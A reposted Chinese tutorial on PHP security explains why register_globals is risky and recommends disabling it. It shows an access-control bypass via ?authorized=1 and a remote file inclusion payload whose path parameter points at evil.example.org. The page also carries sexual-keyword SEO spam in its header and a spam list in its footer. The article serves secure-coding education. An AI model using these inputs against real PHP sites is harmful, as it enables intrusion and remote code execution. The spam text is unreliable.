国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

解析PHP安全之Register Globals

2024-05-04 21:52:19
字體:
來源:轉載
供稿:網友

register_globals參數在 PHP 的 4.2.0 及以上版本中默認為屏蔽。雖然這并不認為是一個安全漏洞,但是的確是一個安全風險。因此,應該始終在開發過程中屏蔽register_globals。

為什么這是一個安全風險?每一種情形都需要的單獨說明才能描述清楚,對于所有情形只給出一個恰當的例子是非常困難的。不管怎樣,最常見的例子是在PHP手冊中描述的:

<?php

if (authenticated_user())
{
$authorized = true;
}

if ($authorized)
{
include '/highly/sensitive/data.php';
}

?>

當參數register_globals開啟的時候,這個頁面可以使用?authorized=1的參數訪問,從而繞過訪問控制。當然,這個明顯的漏洞是糟糕的開發造成的,而不是register_globals的原因,但是這明顯增加了產生危險漏洞的可能。消除了這個影響,普通的全局變量(比如本例中的$authorized)將不再受到客戶端提交的數據的影響。最好的方式是初始化全部變量并且將參數error_reporting設置為E_ALL,這樣使用未初始化的變量就不會在開發的時候被忽略。

另外一個關于register_globals的例子是在使用include包含動態路徑的時候可能產生問題:

<?php

include "$path/script.php";

?>

當參數register_globals開啟的時候,這個頁面可以使用?path=http%3A%2F%2Fevil.example.org%2F%3F的參數訪問,使得本例中的代碼和下面的代碼等同:

<?php

include 'http://evil.example.org/?/script.php';

?>

如果參數allow_url_fopen開啟的時候(即便是在php.ini-recommended中,默認也是開啟的),這將如同包含本地文件一般包含http://evil.example.org/這樣的遠程文件。這是一個常見的安全漏洞,甚至在一些非常著名的開源項目中都發現。

初始化$path可以避免這個隱患,而且不用屏蔽參數register_globals。然而開發人員的失誤可能會產生沒有初始化的變量,修改全局配置以屏蔽參數register_globals可以盡可能的避免這種隱患被忽視。

便利性總是另人愉快的,過去我們不得不手工區分哪些是表單數據,哪些是普通變量。而使用$_POST$_GET內建全局數組也是非常方便的,并且承擔因為開啟參數register_globals造成的風險很不值得。雖然我完全不同意將開啟參數register_globals等同于薄弱的安全,但是我還是強烈建議將其設置為關閉。

需要補充說明的是,屏蔽參數register_globals會幫助開發人員更加留意數據的來源,而這正是一個有安全意識的開發人員所應該具備的素質。

 

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 延寿县| 朔州市| 宜丰县| 贺兰县| 荥经县| 陵川县| 皮山县| 邵阳市| 和田市| 航空| 宜都市| 收藏| 桐庐县| 龙游县| 宁阳县| 孟津县| 黄山市| 满洲里市| 忻州市| 当涂县| 达日县| 恩平市| 宁夏| 凭祥市| 久治县| 松桃| 会昌县| 凤冈县| 南开区| 井冈山市| 兴文县| 三穗县| 金山区| 哈密市| 信阳市| 铁岭市| 泸溪县| 昭苏县| 盖州市| 平顺县| 平顺县|